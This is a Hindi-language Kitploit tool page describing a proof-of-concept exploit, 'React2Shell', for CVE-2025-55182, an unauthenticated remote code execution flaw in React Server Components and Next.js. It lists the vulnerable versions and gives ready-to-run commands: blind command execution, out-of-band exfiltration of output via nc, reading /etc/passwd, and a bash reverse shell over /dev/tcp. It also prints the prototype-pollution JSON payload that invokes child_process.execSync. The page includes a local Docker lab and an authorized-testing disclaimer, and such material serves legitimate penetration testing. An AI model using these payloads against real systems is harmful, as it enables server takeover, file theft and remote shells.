Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182 — CVE-2025-55182 React2Shell PoC | Kitploit
उपकरण/GitHubGitHub/lowercasenumbers/cve-2025-55182
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHublowercasenumbers/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 React2Shell PoC

रिपॉजिटरी देखें
9 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 - React2Shell PoC

CVE-2025-55182 के लिए एक प्रूफ ऑफ कॉन्सेप्ट शोषण, जो React Server Components में एक क्रिटिकल (CVSS 10.0) अप्रमाणित रिमोट कोड निष्पादन भेद्यता है।

श्रेय

द्वारा खोजा गया Lachlan Davidson - 29 नवंबर, 2025 को Meta/React टीम को सूचित किया गया।

भेद्यता अवलोकन

यह भेद्यता React Flight प्रोटोकॉल के डीसेरियलाइज़ेशन तर्क में मौजूद है। HTTP POST के माध्यम से एक दुर्भावनापूर्ण पेलोड भेजकर, एक हमलावर प्रोटोटाइप प्रदूषण प्राप्त कर सकता है जो सर्वर पर मनमाना कोड निष्पादन की ओर ले जाता है।

प्रभावित संस्करण

टूल डाउनलोड करें
पैकेजभेद्य संस्करण
react-server-dom-webpack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-parcel19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-turbopack19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js15.0.4, 15.1.8, 15.2.5, 15.3.5, 15.4.7, 15.5.6, 16.0.6

प्रभावित फ्रेमवर्क

  • Next.js
  • React Router (with RSC)
  • Waku
  • @parcel/rsc
  • @vitejs/plugin-rsc
  • rwsdk (Redwood)

फ़ाइलें

root@kitploit:~
.
├── exploit.py           # शोषण स्क्रिप्ट
├── docker-compose.yml   # भेद्य परीक्षण वातावरण
├── vulnerable-app/      # भेद्य Next.js एप्लिकेशन
└── README.md

त्वरित आरंभ

1. भेद्य कंटेनर प्रारंभ करें

root@kitploit:~
docker compose up -d

यह http://localhost:3000 पर एक भेद्य Next.js एप्लिकेशन प्रारंभ करता है।

2. जाँचें कि लक्ष्य भेद्य है या नहीं

root@kitploit:~
python3 exploit.py -u http://localhost:3000 --check

यह संकेतकों के लिए एक गैर-शोषणकारी जाँच करता है जिसमें शामिल हैं:

  • फ्रेमवर्क पहचान (Next.js, Waku, React Router, आदि)
  • Flight प्रोटोकॉल मार्कर
  • सर्वर एक्शन
  • संस्करण पहचान

3. शोषण (अंध निष्पादन)

root@kitploit:~
python3 exploit.py -u http://localhost:3000 -c "id"

आउटपुट देखे बिना एक कमांड निष्पादित करता है। इसके साथ सत्यापित करें:

4. आउटपुट बाहर निकासी के साथ शोषण

root@kitploit:~
python3 exploit.py -u http://localhost:3000 -c "id" --exfil <IP>:<PORT>

आपका IP पता; सुनने के लिए पोर्ट

उपयोग

root@kitploit:~
usage: exploit.py [-h] -u URL [-c COMMAND] [--check] [--exfil HOST:PORT]
                  [--timeout TIMEOUT] [--no-verify]

options:
  -u, --url URL         लक्ष्य URL
  -c, --command CMD     निष्पादित करने के लिए कमांड
  --check               जाँचें कि भेद्य है या नहीं (गैर-शोषणकारी)
  --exfil HOST:PORT     आउटपुट को HOST:PORT पर बाहर निकालें
  --timeout TIMEOUT     अनुरोध टाइमआउट (डिफ़ॉल्ट: 10)
  --no-verify           SSL सत्यापन अक्षम करें

उदाहरण

root@kitploit:~
# Check vulnerability
python3 exploit.py -u http://localhost:3000 --check

# Blind RCE
python3 exploit.py -u http://localhost:3000 -c "touch /tmp/pwned"

# RCE with output
python3 exploit.py -u http://localhost:3000 -c "whoami" --exfil 172.17.0.1:9999

# Read files
python3 exploit.py -u http://localhost:3000 -c "cat /etc/passwd" --exfil 172.17.0.1:9999

# Reverse shell
python3 exploit.py -u http://localhost:3000 -c "bash -c 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'"

पेलोड संरचना

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\": \"$B0\"}",
  "_response": {
    "_prefix": "process.mainModule.require('child_process').execSync('id');",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

बाहर निकासी

शोषण निष्पादन के दौरान सर्वर स्थिति को दूषित कर देता है, जिससे इन-बैंड प्रतिक्रिया बाहर निकासी अविश्वसनीय हो जाती है। --exfil फ़्लैग आउट-ऑफ-बैंड बाहर निकासी का उपयोग करता है:

root@kitploit:~
┌──────────┐  1. Malicious POST   ┌──────────┐
│ Attacker │ ──────────────────►  │  Server  │
└──────────┘                      └──────────┘
     ▲                                 │
     │  3. Command output              │ 2. RCE executes:
     │     via nc                      │    cmd | nc attacker port
     │                                 ▼
     └─────────────────────────────────┘

सफाई

root@kitploit:~
docker compose down

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। इसका उपयोग केवल उन सिस्टमों के विरुद्ध करें जिनका परीक्षण करने की आपको अनुमति है।

संदर्भ

  • React Security Advisory
  • NVD - CVE-2025-55182
  • Datadog Security Labs